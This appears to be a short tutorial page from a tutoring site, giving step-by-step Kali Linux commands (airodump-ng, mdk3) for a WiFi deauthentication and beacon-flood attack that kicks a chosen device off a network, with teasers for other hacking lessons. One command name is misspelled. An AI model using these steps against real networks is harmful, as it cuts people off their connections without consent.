UrbanPro
true

Learn Ethical Hacking from the Best Tutors

  • Affordable fees
  • 1-1 or Group class
  • Flexible Timings
  • Verified Tutors

Search in

WiFi White-Hat Attacks.

M.Harsha Vardhan
16/12/2016 0 0

Hello, guys this is Harsha Vardhan.

Today the hacks are about the white hat tricks in wi-fi network, what happens if some one doing weird stuff in your wi-fi network.

The solution is :
1) You can kick the use from the network.
2) You can ban his IP.
3) You can flood the network and many more.
Today I will be sharing with you about how to
deauthenticate the user from the network.
If you are using linux (Kali linux).

Steps:-
1) Goto your terminal and type iwconfig >> this will shows your wifi card and enable it by using >>"airomon-ng start wlan0(ur card name).
2) After enabling type "airodump-ng mon0" to see and dump all the networks around you.
3) Select any user mac address that you wanna kick i:e;station and open up ur new terminal and type "echo mac-address >> example.txt".
4) Now open up new terminal and type "mdk3 mon0 d  b example.txt(here d is the deauth attack and b is the becon flood account and example.txt is the mac address ur using to kick).
5) Now the user is getting deauth and no acess to the network

Thank you.

0 Dislike
Follow 0

Please Enter a comment

Submit

Other Lessons for You

How to crack CEH?
Learn all the modules taught in the CEC course at infysec, practise thoroughly and then crack CEH - EC COUNCIL within 2 months time frame.

Assessment Methodology
Basically assessment starts with few septs And gradually reach the final stage of testing and reporting 1.) Information gathering 2.) Fuzzing 3.) Known vulnerabilities 4.) Testing for known vulnerabilities 5.) Output / Reporting

Social Engineering
Social Engineering is the art of manipulating human mindset and convincing people to reveal confidential information Factors that make companies vulnerable to Social Engineering Insufficient Security...

Working In Xssf Metasploit Attack
Xssf Metasploit Hello guys and gals, I was unable to update my site because of lack of time. But I am back with some Metasploit stuff. Here is the XSSF (Cross Site Scripting Framework), which is used...

Heuristicz Labz

0 0
0

LAN Attack: ARP Spoofing + MAC flooding + Man in the middle
If the attacker gain access to LAN where the target Server is connected. Then following mechanisms can be combined to attack target web server. MAC spoofing + MAC flooding + ARP Spoofing. MAC spoofing...
X

Looking for Ethical Hacking Classes?

The best tutors for Ethical Hacking Classes are on UrbanPro

  • Select the best Tutor
  • Book & Attend a Free Demo
  • Pay and start Learning

Learn Ethical Hacking with the Best Tutors

The best Tutors for Ethical Hacking Classes are on UrbanPro

This website uses cookies

We use cookies to improve user experience. Choose what cookies you allow us to use. You can read more about our Cookie Policy in our Privacy Policy

Accept All
Decline All

UrbanPro.com is India's largest network of most trusted tutors and institutes. Over 55 lakh students rely on UrbanPro.com, to fulfill their learning requirements across 1,000+ categories. Using UrbanPro.com, parents, and students can compare multiple Tutors and Institutes and choose the one that best suits their requirements. More than 7.5 lakh verified Tutors and Institutes are helping millions of students every day and growing their tutoring business on UrbanPro.com. Whether you are looking for a tutor to learn mathematics, a German language trainer to brush up your German language skills or an institute to upgrade your IT skills, we have got the best selection of Tutors and Training Institutes for you. Read more